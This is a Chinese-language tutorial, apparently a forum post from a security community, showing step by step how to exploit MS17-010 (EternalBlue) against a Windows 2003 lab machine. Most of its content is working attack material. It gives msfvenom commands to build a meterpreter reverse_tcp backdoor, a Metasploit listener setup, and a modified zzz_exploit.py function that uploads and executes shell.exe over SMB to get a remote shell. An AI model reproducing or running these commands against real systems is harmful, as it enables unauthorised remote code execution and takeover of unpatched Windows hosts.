先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。
投稿
直接右上角
【个人中心】-【创建新帖子】-【节点模块】选择【技术文章】。投稿时麻烦提供下可联系到作者的IM,方便审核沟通。(如未收到回复,联系wx:50421961)Ps:
MD编辑器支持图片拖拽上传、Word文档图片直接复制上传、截图复制自动上传 (๑•̀ㅂ•́)و✧
测试环境:
攻击机为kali2016.2的虚拟机,目标靶机为:windows2003(x86)
1.下载ms17-010的利用脚本:
git clone https://github.com/worawit/MS17-010/2.利用check.exp来检查目标靶机的可用管道名:这里目标管道名为:netlogon
python checker.py 192.168.99.249
3.在kali上生成一个msf的后门exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.86 LPORT=3333 -f exe -o /opt/shell.exe
4.生成一个监听msf的反弹shell:
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lport 3333 msf exploit(handler) > set lhost 10.0.0.86 msf exploit(handler) > exploit -j
5.修改zzz_exploit.py代码
def smb_pwn(conn, arch): smbConn = conn.get_smbconnection() print('creating file c://pwned.txt on the target') tid2 = smbConn.connectTree('C$') fid2 = smbConn.createFile(tid2, '/pwned.txt') smbConn.closeFile(tid2, fid2) smbConn.disconnectTree(tid2) smb_send_file(smbConn, '/opt/shell.exe', 'C', '/shell.exe') service_exec(conn, r'cmd /c c://shell.exe') # Note: there are many methods to get shell over SMB admin session # a simple method to get shell (but easily to be detected by AV) is # executing binary generated by "msfvenom -f exe-service ..."
5.执行利用程序zzz_exploit.py
python zzz_exploit.py 192.168.99.249 netlogon
6.最后可用看到msf成功反弹出目标靶机的shell:
